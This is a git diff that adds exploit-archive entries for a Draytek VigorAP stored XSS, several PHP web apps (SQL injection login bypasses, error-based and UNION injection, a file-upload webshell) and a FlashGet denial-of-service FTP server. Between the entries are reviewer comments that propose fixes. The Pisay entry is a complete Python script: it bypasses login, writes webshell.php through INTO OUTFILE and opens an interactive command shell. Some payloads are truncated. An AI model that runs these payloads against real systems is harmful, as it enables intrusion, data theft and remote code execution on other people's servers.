diff --git a/exploits/hardware/webapps/48436.txt b/exploits/hardware/webapps/48436.txt
new file mode 100644
index 000000000..0260e847c
--- /dev/null
+++ b/exploits/hardware/webapps/48436.txt
@@ -0,0 +1,147 @@
+# Title: Draytek VigorAP 1000C - Persistent Cross-Site Scripting
+# Author: Vulnerability Laboratory
+# Date: 2020-05-07
+# Vendor: https://www.draytek.com/
+# Software: https://www.draytek.com/products/vigorap-903/
+# CVE: N/A
+
+Document Title:
+===============
+Draytek VigorAP - (RADIUS) Persistent XSS Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2244
+
+
+Common Vulnerability Scoring System:
+====================================
+4
+
+
+Product & Service Introduction:
+===============================
+https://www.draytek.com/
+https://www.draytek.com/products/vigorap-903/
+
+
+
+Affected Product(s):
+====================
+Draytek
+[+] VigorAP 1000C | 1.3.2
+[+] VigorAP 700 | 1.11
+[+] VigorAP 710 | 1.2.5
+[+] VigorAP 800 | 1.1.4
+[+] VigorAP 802 | 1.3.2
+[+] VigorAP 810 | 1.2.5
+[+] VigorAP 900 | 1.2.0
+[+] VigorAP 902 | 1.2.5
+[+] VigorAP 903 | 1.3.1
+[+] VigorAP 910C | 1.2.5
+[+] VigorAP 912C | 1.3.2
+[+] VigorAP 918R Series | 1.3.2
+[+] VigorAP 920R Series | 1.3.0
+[+] All other VigorAP Series with Radius Module
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-05-07: Public Disclosure (Vulnerability Laboratory)
+
+
+Technical Details & Description:
+================================
+A persistent input validation vulnerability has been discovered in the
+official Draytek VigorAP product series application.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise
+browser to web-application requests from the application-side.
+
+The persistent input validation web vulnerability is located in the
+username input field of the RADIUS Setting - RADIUS Server
+Configuration module. Remote attackers with limited access are able to
+inject own malicious persistent script codes as username.
+Other privileged user accounts execute on preview of the modules
+context. The request method to inject is POST and the attack
+vector is located on the application-side.
+
+Successful exploitation of the vulnerability results in session
+hijacking, persistent phishing attacks, persistent external
+redirects to malicious source and persistent manipulation of affected
+application modules.
+
+Vulnerable Module(s):
+[+] RADIUS Setting - RADIUS Server Configuration - Users Profile
+
+Vulnerable Input(s):
+[+] Username
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation web vulnerabilities can be exploited by
+remote attackers with low privileged user account and low user interaction.
+For security demonstration or to reproduce the security vulnerability
+follow the provided information an steüs below to continue.
+
+
+PoC: Payload
+
+
+
+PoC: Vulnerable Source (http:/vigorAP.localhost:50902/home.asp)
+
+
+
+Reference(s):
+http:/vigorAP.localhost:50902/
+http:/vigorAP.localhost:50902/home.asp
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
\ No newline at end of file
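Review bot: The `PoC: Payload` and `PoC: Vulnerable Source` headings are followed by nothing, and the hunk header declares 147 added lines while only 112 are present, so the markup under them was presumably stripped on import. As committed, the entry asserts a stored XSS in the RADIUS user-profile `Username` field without showing which page renders the value unencoded. The title names the VigorAP 1000C while the `# Software:` link points at the vigorap-903 product page, and the `Reference(s)` URLs read `http:/vigorAP.localhost` with a single slash. The advisory gives no fixed firmware version or mitigation; a line such as `# Mitigation: HTML-encode the RADIUS username wherever it is rendered and restrict management-UI access to trusted admin networks` would make it usable for triage. The typo `an steüs` should read `and steps`.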
diff --git a/exploits/php/webapps/48435.txt b/exploits/php/webapps/48435.txt
new file mode 100644
index 000000000..431b45a16
--- /dev/null
+++ b/exploits/php/webapps/48435.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Car Park Management System 1.0 - Authentication Bypass
+# Date: 2020-05-07
+# Exploit Author: Tarun Sehgal
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/car-park-management-system.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+---------------------------------------------------------------------------------
+
+#parameter Vulnerable: phone and password
+#Injected Request
+#Below request will allow authentication bypass
+
+POST /Car%20Park%20Management%20System/proc/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 52
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/Car%20Park%20Management%20System/
+Cookie: PHPSESSID=d84agc0pp6qihtm7u775ftvukd
+Upgrade-Insecure-Requests: 1
+
+phone=' or '1'='1&password=' or '1'='1&Submit=Log+In
\ No newline at end of file
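Review bot: The captured request commits a real-looking session identifier on the `Cookie: PHPSESSID=` line, and the same happens in 48437.txt and 48440.txt; replace the value with a placeholder such as `Cookie: PHPSESSID=REDACTED`, since the identifier adds nothing to the finding. The entry also stops at the request and never states the root cause or the fix. The body suggests `proc/login.php` builds its SQL from `phone` and `password` by string concatenation, though the source is not shown here. A header line such as `# Fix: bind phone and password as prepared-statement parameters and check the password with password_verify() against a stored hash` would document it, and the same kind of line is missing from 48437.txt and 48440.txt.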
diff --git a/exploits/php/webapps/48437.txt b/exploits/php/webapps/48437.txt
new file mode 100644
index 000000000..56e9304bb
--- /dev/null
+++ b/exploits/php/webapps/48437.txt
@@ -0,0 +1,32 @@
+# Exploit Title: School File Management System 1.0 - 'username' SQL Injection
+# Date: 2020-05-04
+# Exploit Author: Tarun Sehgal
+# Vendor Homepage: https://www.sourcecodester.com/php/14155/school-file-management-system.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/school-file-management-system.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+---------------------------------------------------------------------------------
+
+#parameter Vulnerable: username
+# Injected Request
+POST /sfms/admin/index.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 173
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/sfms/admin/index.php
+Cookie: PHPSESSID=084gi60nhgqp5lpba3q6qngk9g
+Upgrade-Insecure-Requests: 1
+
+username=admin' OR 1 GROUP BY CONCAT(database(),(SELECT (CASE WHEN (7665=7665) THEN 1 ELSE 0 END)),0x3a,0x3a,version(),FLOOR(RAND(0)*2)) HAVING MIN(0)#&password=admin&login=
+
+
+
+//Comment
+Above request will print database name and MariaDB version.
\ No newline at end of file
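Review bot: The closing note (`Above request will print database name and MariaDB version`) leaves out why the values are printed. The `GROUP BY CONCAT(... FLOOR(RAND(0)*2))` form looks like the error-based technique, which discloses data only when the application returns the database error text to the client. That is worth stating because it gives defenders a second control besides parameterising `username` in `/sfms/admin/index.php`. I would add `# Mitigation: use a prepared statement for the login query and never echo database errors to the client (display_errors=Off, generic error page)`. The note is also introduced with `//Comment` where the rest of the header uses `#`.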
diff --git a/exploits/php/webapps/48438.txt b/exploits/php/webapps/48438.txt
new file mode 100644
index 000000000..d1694393e
--- /dev/null
+++ b/exploits/php/webapps/48438.txt
@@ -0,0 +1,22 @@
+# Exploit Title: Online Clothing Store 1.0 - Arbitrary File Upload
+# Date: 2020-05-05
+# Exploit Author: Sushant Kamble and Saurav Shukla
+# Vendor Homepage: https://www.sourcecodester.com/php/14185/online-clothing-store.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-clothing-store_0.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+
+#Vulnerable Page: Products.php
+
+#Exploit
+ Open Products.php and select any product
+ Fill details
+ Create php shell code with below script
+ &1'); ?>
+ Click on upload Image
+ Select php file
+ Click Submet
+ Access below URL:
+ http://localhost/online%20Clothing%20Store/Products/shell.php?e=dir
+ add system commands after e to execute it.
\ No newline at end of file
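Review bot: The step under `Create php shell code with below script` is a truncated fragment (`&1'); ?>`), so the opening of the snippet was evidently lost on import and the step cannot be reviewed as written. More importantly for anyone hardening this application, the entry never states the root cause. From the steps it appears to be that the image upload on `Products.php` accepts a `.php` file and stores it under the web-served `Products/` directory, where it executes. A header line such as `# Mitigation: allow-list image extensions and verify content type server-side, store uploads under generated names outside the web root, and disable PHP execution in the upload directory` would cover it. `Click Submet` should read `Click Submit`.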
diff --git a/exploits/php/webapps/48439.txt b/exploits/php/webapps/48439.txt
new file mode 100644
index 000000000..e5d2f212d
--- /dev/null
+++ b/exploits/php/webapps/48439.txt
@@ -0,0 +1,74 @@
+# Exploit Title: Pisay Online E-Learning System 1.0 - Remote Code Execution
+# Exploit Author: Bobby Cooke
+# Date: 2020-05-05
+# Vendor Homepage: https://www.sourcecodester.com/php/14192/pisay-online-e-learning-system-using-phpmysql.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/e-learningsystem_0.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
+# Description: Pisay Online E-Learning System v1.0 - SQLi Auth Bypass + Remote Code Execution (RCE)
+
+# Vulnerable Source Code:
+# /e-learningsystem/admin/login.php
+# 121 $email = trim($_POST['user_email']);
+# 122 $upass = trim($_POST['user_pass']);
+# 123 $h_upass = sha1($upass);
+# 132 $user = new User();
+# 134 $res = $user::userAuthentication($email, $h_upass);
+# /e-learningsystem/include/accounts.php
+# 3 class User {
+# 23 static function userAuthentication($email,$h_pass){
+# 25 $mydb->setQuery("SELECT * FROM `tblusers` WHERE `UEMAIL` = '". $email ."' and `PASS` = '". $h_pass ."'");
+# /e-learningsystem/admin/modules/lesson/edit.php
+# 6 @$id = $_GET['id'];
+# 7 if($id==''){
+# 10 $lesson = New Lesson();
+# 11 $res = $lesson->single_lesson($id);
+# /e-learningsystem/include/lessons.php
+# 4 class Lesson {
+# 5 protected static $tblname = "tbllesson";
+# 35 function single_lesson($id=0){
+# 37-38 $mydb->setQuery("SELECT * FROM ".self::$tblname." Where LessonID= '{$id}' LIMIT 1");
+
+import requests, sys, re
+
+requests.packages.urllib3.\
+disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+def webshell(SERVER_URL):
+ try:
+ while True:
+ cmd = raw_input('C:\\ ')
+ command = {'cmd': cmd}
+ r2 = s.get(SERVER_URL+'../../../../webshell.php', params=command, verify=False)
+ response = r2.text
+ cleanResponse = response.replace('AAAAAAAAAAAAAAA', '')
+ cleanResponse = cleanResponse.replace('313371337', '')
+ print(cleanResponse)
+ except:
+ print("\r\nExiting.")
+ sys.exit(-1)
+
+if __name__ == "__main__":
+ if len(sys.argv) != 2:
+ print "(+) Usage: %s " % sys.argv[0]
+ print "(+) Example: %s 'https://10.0.0.3:443/e-learningsystem/'" % sys.argv[0]
+ sys.exit(-1)
+ SERVER_URL = sys.argv[1]
+ ADMIN_URL = SERVER_URL + 'admin/login.php'
+ LESSON_URL = SERVER_URL + 'admin/modules/lesson/index.php'
+ s = requests.Session()
+ s.get(SERVER_URL, verify=False)
+ payload1 = {'user_email': "boku' OR 1337=1337 LIMIT 1 -- PowerUp", 'user_pass': 'InstantTransmission', 'btnLogin': ''}
+ s.post(ADMIN_URL, data=payload1, verify=False)
+
+ payload2 = {'view': 'edit', 'id': '31337\' AND 1337=31337 union all select 313371337,"AAAAAAAAAAAAAAA",@@datadir,"AAAAAAAAAAAAAAA","AAAAAAAAAAAAAAA" -- kamahamaha'}
+ r1 = s.get(LESSON_URL, params=payload2, verify=False)
+ dirtyPath = str(re.findall(r'"Title" type="text" value=".*>', r1.text))
+ dataPath=re.sub('^.*"Title" type="text" value="', '', dirtyPath)
+ dataPath=re.sub('">.*$', '', dataPath)
+ dataPath=dataPath.replace('\\\\', '/')
+ xamppPath=re.sub('xampp.*', 'xampp', dataPath)
+ payload3 = {'view': 'edit', 'id': '31337\' AND 1337=31337 union all select 313371337,"AAAAAAAAAAAAAAA","","AAAAAAAAAAAAAAA","AAAAAAAAAAAAAAA" into OUTFILE \''+xamppPath+'/htdocs/webshell.php\' -- kamahamaha'}
+ print(payload3)
+ s.get(LESSON_URL, params=payload3, verify=False)
+ webshell(SERVER_URL)
\ No newline at end of file
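Review bot: The `# Vulnerable Source Code:` header quotes the two concatenated queries (`userAuthentication` in `include/accounts.php` and `single_lesson` in `include/lessons.php`) but the entry never says what closes them or what the file-write step depends on. Both queries should use bound parameters. The `into OUTFILE` write into `htdocs` presumably succeeds only because the application's database account holds the `FILE` privilege and `secure_file_priv` does not restrict the target directory. I would add a header comment along the lines of `# Mitigation: prepared statements for UEMAIL/PASS and LessonID; revoke FILE from the app DB user; set secure_file_priv; alert on new .php files under htdocs`. Separately, the script mixes Python 2 statements (`print "..."`, `raw_input`) with `print(...)` calls, and `webshell()` reads the module-level `s` instead of taking the session as a parameter; both `webshell` and the `__main__` block lie fully inside this hunk.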
diff --git a/exploits/php/webapps/48440.txt b/exploits/php/webapps/48440.txt
new file mode 100644
index 000000000..4e79b1d9d
--- /dev/null
+++ b/exploits/php/webapps/48440.txt
@@ -0,0 +1,51 @@
+# Exploit Title: Online AgroCulture Farm Management System 1.0 - 'pid' SQL Injection
+# Google Dork: N/A
+# Date: 2020-05-07
+# Exploit Author: BKpatron
+# Vendor Homepage: https://www.sourcecodester.com/php/14198/online-agroculture-farm-management-system-phpmysql.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14198&title=Online+AgroCulture+Farm+Management+System+in+PHP%2FMySQL
+# Version: v1.0
+# Tested on: Win 10
+# CVE: N/A
+# my website: bkpatron.com
+
+# Discription:
+The Online AgroCulture Farm Management System v1.0 application is vulnerable to
+SQL injection via the 'pid' parameter on the review.php page.
+# vulnerable file : review.php
+http://localhost/AgroCulture/review.php?pid=27
+
+Parameter: pid (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: pid=27' AND 5853=5853 AND 'EmvW'='EmvW
+
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+ Payload: pid=27' AND (SELECT 9739 FROM(SELECT COUNT(*),CONCAT(0x7170627071,(SELECT (ELT(9739=9739,1))),0x7176626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'tpnl'='tpnl
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: pid=27' AND (SELECT 7650 FROM (SELECT(SLEEP(5)))bwDl) AND 'IWff'='IWff
+
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 8 columns
+ Payload: pid=-6157' UNION ALL SELECT NULL,NULL,CONCAT(0x7170627071,0x6d7a6346644349635a495a424c56644c51666866664553794e674764546a6c67747a69634749516a,0x7176626a71),NULL,NULL,NULL,NULL,NULL-- RXWN
+[INFO] the back-end DBMS is MySQL
+web application technology: PHP, Apache 2.4.39, PHP 7.2.18
+back-end DBMS: MySQL >= 5.0
+
+
+# Proof of Concept:
+http://localhost/vulnerability/ncn/AgroCulture/review.php?pid=sqli
+
+GET AgroCulture/review.php?pid=27 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie:PHPSESSID=gd27cb23t7m8o57giuvh0f8e7m
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+pid=-6157%27%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7170627071,0x6d7a6346644349635a495a424c56644c51666866664553794e674764546a6c67747a69634749516a,0x7176626a71),NULL,NULL,NULL,NULL,NULL--%20RXWN
\ No newline at end of file
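Review bot: The request block at the end of the entry does not match the finding it documents. `pid` is reported as a GET parameter, yet the encoded value sits on a line after the headers while the request line still carries `pid=27`, and the request line has no leading slash. The `# Proof of Concept:` URL also uses the path `/vulnerability/ncn/AgroCulture/` where the `# vulnerable file` line uses `/AgroCulture/`, so a reader cannot tell which deployment was tested. Since `pid` appears to be a numeric identifier, one remediation line would cover all four techniques in the scanner output, e.g. `# Fix: cast pid to an integer or bind it as a prepared-statement parameter in review.php`. `# Discription:` should read `# Description:`.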
diff --git a/exploits/windows/dos/48434.py b/exploits/windows/dos/48434.py
new file mode 100755
index 000000000..89236db7f
--- /dev/null
+++ b/exploits/windows/dos/48434.py
@@ -0,0 +1,54 @@
+# Exploit Title: FlashGet 1.9.6 - Denial of Service (PoC)
+# Date: 2020-05-02
+# Author: Milad Karimi
+# Testen on: Kali Linux
+# Software Link: http://www.flashget.com/en/download.htm?uid=undefined
+# Version: 1.9.6
+# CVE : N/A
+
+#!/usr/bin/python
+
+from time import sleep
+from socket import *
+
+res = [
+ '220 WELCOME!! :x\r\n',
+ '331 Password required for %s.\r\n',
+ '230 User %s logged in.\r\n',
+ '250 CWD command successful.\r\n',
+ '257 "%s/" is current directory.\r\n' # <-- %s B0f :x
+ ]
+
+buf = 'A' * 332
+
+s = socket(AF_INET, SOCK_STREAM)
+s.bind(('0.0.0.0', 21))
+s.listen(1)
+print '[+] listening on [FTP] 21 ...\n'
+c, addr = s.accept()
+c.send(res[0])
+
+user = ''
+
+for i in range(1, len(res)):
+ req = c.recv(1024)
+ print '[*][CLIENT] %s' % (req)
+ tmp = res[i]
+ if(req.find('USER') != -1):
+ req = req.replace('\r\n', '')
+ user = req.split('\x20', 1)[1]
+ tmp %= user
+ if(req.find('PASS') != -1):
+ tmp %= user
+ if(req.find('PWD') != -1):
+ tmp %= buf
+ print '[*][SERVER] %s' % (tmp)
+ c.send(tmp)
+
+sleep(5)
+c.close()
+s.close()
+
+print '[+] DONE'
+
+# Discovered By : Milad Karimi
\ No newline at end of file
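Review bot: `s.bind(('0.0.0.0', 21))` exposes the test listener on every interface of the machine running it; for a lab crash reproduction, binding to one address (`s.bind(('127.0.0.1', 21))` or the isolated lab interface) keeps it unreachable from other networks. The `#!/usr/bin/python` line sits below the comment header, so it is not the first line and has no effect even though the file is added with mode 100755. The script is Python 2 only (`print '...'` statements, `str` passed to `send`), which the header should state, and `from socket import *` would be clearer as explicit names. The trigger is named only by the inline remark on the `257` reply; a header line such as `# Cause: FlashGet 1.9.6 crashes when the 257 (PWD) reply carries an over-long directory name` would tell users what to avoid.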
diff --git a/files_exploits.csv b/files_exploits.csv
index 88b87f0df..ce1992889 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6730,6 +6730,7 @@ id,file,description,date,author,type,platform,port
48305,exploits/windows/dos/48305.py,"AbsoluteTelnet 11.12 - 'SSH1/username' Denial of Service (PoC)",2020-04-10,chuyreds,dos,windows,
48342,exploits/hardware/dos/48342.txt,"Cisco IP Phone 11.7 - Denial of service (PoC)",2020-04-17,"Jacob Baines",dos,hardware,
48402,exploits/windows/dos/48402.py,"VirtualTablet Server 3.0.2 - Denial of Service (PoC)",2020-05-01,"Dolev Farhi",dos,windows,
+48434,exploits/windows/dos/48434.py,"FlashGet 1.9.6 - Denial of Service (PoC)",2020-05-07,"Milad karimi",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
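Review bot: The author column of the new rows does not match the author lines in the files this commit adds. The 48434 row here has `"Milad karimi"` where the file says `Milad Karimi`, and in the next hunk the 48438 row lists only `"Sushant Kamble"` although 48438.txt credits `Sushant Kamble and Saurav Shukla`. Dropping a co-author from the index loses attribution for anyone searching the CSV, so I would carry both names, e.g. `"Sushant Kamble & Saurav Shukla"`, and fix the casing. The date column is 2020-05-07 on every new row while several file headers give earlier dates (2020-05-02, 2020-05-04, 2020-05-05); if the column is meant to be the publication date that is fine, but the index documentation should say so.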
@@ -42666,3 +42667,9 @@ id,file,description,date,author,type,platform,port
48431,exploits/ruby/webapps/48431.txt,"GitLab 12.9.0 - Arbitrary File Read",2020-05-06,KouroshRZ,webapps,ruby,
48432,exploits/php/webapps/48432.txt,"YesWiki cercopitheque 2020.04.18.1 - 'id' SQL Injection",2020-05-06,coiffeur,webapps,php,
48433,exploits/php/webapps/48433.txt,"MPC Sharj 3.11.1 - Arbitrary File Download",2020-05-06,SajjadBnd,webapps,php,
+48435,exploits/php/webapps/48435.txt,"Car Park Management System 1.0 - Authentication Bypass",2020-05-07,"Tarun Sehgal",webapps,php,
+48436,exploits/hardware/webapps/48436.txt,"Draytek VigorAP 1000C - Persistent Cross-Site Scripting",2020-05-07,Vulnerability-Lab,webapps,hardware,
+48437,exploits/php/webapps/48437.txt,"School File Management System 1.0 - 'username' SQL Injection",2020-05-07,"Tarun Sehgal",webapps,php,
+48438,exploits/php/webapps/48438.txt,"Online Clothing Store 1.0 - Arbitrary File Upload",2020-05-07,"Sushant Kamble",webapps,php,
+48439,exploits/php/webapps/48439.txt,"Pisay Online E-Learning System 1.0 - Remote Code Execution",2020-05-07,boku,webapps,php,
+48440,exploits/php/webapps/48440.txt,"Online AgroCulture Farm Management System 1.0 - 'pid' SQL Injection",2020-05-07,BKpatron,webapps,php,